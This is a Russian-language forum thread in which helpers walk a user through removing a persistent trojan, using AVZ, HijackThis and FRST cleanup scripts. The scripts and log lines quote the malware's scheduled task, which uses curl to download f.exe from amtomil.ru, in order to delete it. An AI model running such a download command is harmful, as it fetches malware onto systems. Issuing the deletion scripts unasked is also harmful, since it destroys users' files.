Перейти к содержанию

Trojan.Multi.GenAutorunTask.c в системной памяти


Рекомендуемые сообщения

Здравствуйте, Kaspersky Endpoint Security 11 при каждом запуске системы находит вирус Trojan.multi.genautoruntask.c в системной памяти, при попытке устранить угрозу Касперский пишет что 1 объект не обработан. Лог с утилиты AVZ прилагаю, заранее спасибо

avz_log.txt

Ссылка на сообщение
Поделиться на другие сайты

Файл Hosts правили самостоятельно?

 

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
SearchRootkit(true, true);
SetAVZGuardStatus(True);
 QuarantineFileF('c:\users\администратор\appdata\roaming\curl', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0 ,0);
 QuarantineFile('C:\Windows\Fonts\Mysql\svchost.exe', '');
 QuarantineFile('C:\Users\Администратор\AppData\Roaming\curl\curl.exe', '');
 QuarantineFile('C:\Users\Администратор\AppData\Roaming\curl\curl_7_54.exe', '');
 DeleteFile('C:\Users\Администратор\AppData\Roaming\curl\curl_7_54.exe -f -L "http://amtomil.ru/f.exe" -o "C:\Users\Администратор\AppData\Roaming\curl\curl.exe"', '32');
 DeleteFile('C:\Users\Администратор\AppData\Roaming\curl\curl.exe', '32');
 DeleteFile('C:\Users\Администратор\AppData\Roaming\curl\curl_7_54.exe', '32');
 DeleteFileMask('c:\users\администратор\appdata\roaming\curl', '*', true);
 DeleteSchedulerTask('curl.quarantined');
 DeleteSchedulerTask('curls.quarantined');
 DeleteDirectory('c:\users\администратор\appdata\roaming\curl');
BC_ImportALL;
ExecuteSysClean;
BC_Activate;
 ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.

 

Компьютер перезагрузится. После перезагрузки, выполните такой скрипт:

begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); 
end.

Полученный архив quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 10 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.

 

"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):

O22 - Task: (damaged) \Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser - C:\Windows\system32\CompatTelRunner.exe (Microsoft) (user missing)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{077474CB-DA6A-4E14-B6A9-341EF37FFD66} - \Update S1-8-22 (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{077474CB-DA6A-4E14-B6A9-341EF37FFD66} (no key)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1845DCCB-BDFF-4505-AA9C-8832A71E5272} - \Opera scheduled Autoupdate 1513753951 (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2F7BB325-9C0A-4CF6-8BDA-C207F52F596F} - \One Drive Update (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2F7BB325-9C0A-4CF6-8BDA-C207F52F596F} (no key)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3A3CA751-82FC-408C-8BC4-146686D1A61C} - \ZaxarGameBrowserz (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{88EED5FC-F20A-4576-8EAB-7BB5C9FC7647} - \nvfontcache (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{88EED5FC-F20A-4576-8EAB-7BB5C9FC7647} (no key)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{91C3A511-4FC9-4B54-9487-65A0ED9DC6D4} - \curl (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{91C3A511-4FC9-4B54-9487-65A0ED9DC6D4} (no key)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9DE96F17-EC17-45E4-8F73-0A669AB3620D} - \GoogleUpdate_Task_Core (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B87A35B3-F913-4D71-AC10-AECB5E9564B6} - \curls (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B87A35B3-F913-4D71-AC10-AECB5E9564B6} (no key)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B9B6770E-F99B-4FA0-BD0D-2C0F0FD70E45} - \GoogleUpdate_Task_Machine (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CB033D7D-7D93-4542-8D42-B6C9194CEFE9} - \DuckGo Task (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CB033D7D-7D93-4542-8D42-B6C9194CEFE9} (no key)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CFB0A9F3-BCE4-4F84-A97E-B40E83A30A59} - \OnePlus Drive Update (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CFB0A9F3-BCE4-4F84-A97E-B40E83A30A59} (no key)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WPD (empty)
O22 - Task: curl.quarantined - C:\Users\Администратор\AppData\Roaming\curl\curl_7_54.exe -f -L "http://amtomil.ru/f.exe" -o "C:\Users\Администратор\AppData\Roaming\curl\curl.exe" (file missing)
O22 - Task: curls.quarantined - C:\Users\Администратор\AppData\Roaming\curl\curl.exe (file missing)

 

Для повторной диагностики запустите снова AutoLogger. В первом диалоговом окне нажмите "ОК", удерживая нажатой клавишу "Shift".

Ссылка на сообщение
Поделиться на другие сайты

Результат загрузки:

Sergey_IT, Ваш карантин отправлен, спасибо!

Имя карантин-а(ов) сообщите в теме:
2021.11.19_quarantine_de95fbc0c2ec83b5050ec09d90fef25f.zip
Ссылка на сообщение
Поделиться на другие сайты

Дополнительно:

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Да для соглашения с предупреждением.

Нажмите кнопку Сканировать (Scan).
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 

Ссылка на сообщение
Поделиться на другие сайты
1 час назад, Sandor сказал:

Файл Hosts правили самостоятельно?

Не ответили.

 

Сообщите также самостоятельно ли ставили программу?

Цитата

Chromium-Gost

 

Ссылка на сообщение
Поделиться на другие сайты

Hosts правил, необходимо было его отредактировать для работы в тот момент когда рабочая станция находилась раннее в домене.

Chromium-Gost так же устанавливал сам.

Ссылка на сообщение
Поделиться на другие сайты

Примите к сведению - после выполнения скрипта (возможно) все открытые вкладки браузеров будут закрыты, произойдет выход из аккаунтов, временные файлы, корзина, история браузеров, куки и кэш будут очищены.

  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Start::
    SystemRestore: On
    CreateRestorePoint:
    HKU\S-1-5-21-3800301354-2339470603-2501348306-1000\...\MountPoints2: {7152c183-07d3-11e7-8ee1-806e6f6e6963} - D:\ShelExec.exe open.htm
    GroupPolicy: Ограничение ? <==== ВНИМАНИЕ
    GroupPolicy\User: Ограничение ? <==== ВНИМАНИЕ
    Policies: C:\ProgramData\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
    Policies: C:\Users\OtepovaNV\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
    Policies: C:\Users\Администратор\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
    U3 aswbdisk; отсутствует ImagePath
    2021-11-18 15:08 - 2020-03-04 10:23 - 000000000 __SHD C:\AdwCleaner
    AlternateDataStreams: C:\ProgramData\TEMP:E965A533 [129]
    FirewallRules: [{CABC3625-F663-4B5E-A80F-340729CFD55B}] => (Allow) C:\Program Files\TeamViewer\TeamViewer.exe => Нет файла
    FirewallRules: [{96A891F5-CBCF-48A7-8410-3C9DFF98F47E}] => (Allow) C:\Program Files\TeamViewer\TeamViewer.exe => Нет файла
    FirewallRules: [{47C59CAE-394B-4755-A04A-F2928CD7DBFA}] => (Allow) C:\Program Files\TeamViewer\TeamViewer_Service.exe => Нет файла
    FirewallRules: [{DBB8EFF7-66D7-446C-9215-572DE771C34F}] => (Allow) C:\Program Files\TeamViewer\TeamViewer_Service.exe => Нет файла
    FirewallRules: [{125E7D45-4FFE-4A8E-8D8D-30E4A9402992}] => (Allow) C:\Users\Администратор\AppData\Roaming\uTorrent\uTorrent.exe => Нет файла
    FirewallRules: [{E4C7ED3D-8220-4B12-A4A4-110A30FC0324}] => (Allow) C:\Users\Администратор\AppData\Roaming\uTorrent\uTorrent.exe => Нет файла
    EmptyTemp:
    Reboot:
    End::

     

  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.


Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

Ссылка на сообщение
Поделиться на другие сайты

Присоединяйтесь к обсуждению

Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.

Гость
Ответить в этой теме...

×   Вставлено с форматированием.   Вставить как обычный текст

  Разрешено использовать не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отображать как обычную ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставлять изображения напрямую. Загружайте или вставляйте изображения по ссылке.

  • Похожий контент

    • Ivan5
      От Ivan5
      Добрый день!
      одним снежным ноябрьским днем обнаружили, что все файлы в общей папке успешно зашифрованы. файлы не архиважные, но неприятно)
      что этому предшествовало особо неясно
      вот такая картинка показывается (id замазал на всякий случай)
       

      CollectionLog-2022.11.18-16.37.zip
       
      Сообщение от модератора Mark D. Pearlstone Тема перемещена из раздела "Помощь в удалении вирусов".
    • XanderUnder
      От XanderUnder
      Здравствуйте, скачал файл, при установке обнаружил троян script/wacatac.h!ml, при сканировании через Win Defender обнаруживается этот троян, Статус: восстановление не завершено. При открытии диспетчера задач нагрузка цп резко пада ет с приблизительно 90-100% до 2-10%, похоже на майнер. При сканировании с помощью Kaspersky VRT угроза не обнаруживается

      CollectionLog-2022.11.19-16.00.zip
    • Ильмир
      От Ильмир
      установил kms office, после этого, что бы очистить систему решил установить Касперский, но получается установленный вирус блокирует его. как теперь удалить этот вирус?
    • dverutin
      От dverutin
      Добрый день!
      Сегодня мой Kaspersky Free 21.3.10.391(j) обнаружил нечто под названием Trojan.Multi.GenAutorunProc.a в системной памяти и предложил лечить. Я выбрал лечение с перезагрузкой компьютера, однако по его завершению Касперский снова обнаружил ту же самую программу. Проблема появилась после обновления браузеров Chrome и Firefox и перехода на сайт https://ccsb.scripps.edu/mgltools/, который почему-то крайне плохо прогружался. Как мне удалить троян?
      CollectionLog-2022.11.17-17.48.zip
    • alextototo12
      От alextototo12
      Здравствуйте! После скачивания не желательного ПО (трейнер для игры) из не проверенного источника в браузере Opera, Microsoft Defender сразу заблокировал файлы, как только они загрузились, появилось сообщение об обнаружении угроз трояна Wacatac.B!ml (критический уровень) и Dealply!mclg (высокий уровень).  Вирусы были помещены в карантин, а через некоторое время появилось сообщение "Сбой карантина - Эта угроза или приложение могут быть исправлены НЕ полностью". С помощью AutoLogger просканировал систему и подготовил логи. Рассчитываю на вашу помощь в удаление вирусов.


      CollectionLog-2022.11.07-19.34.zip
×
×
  • Создать...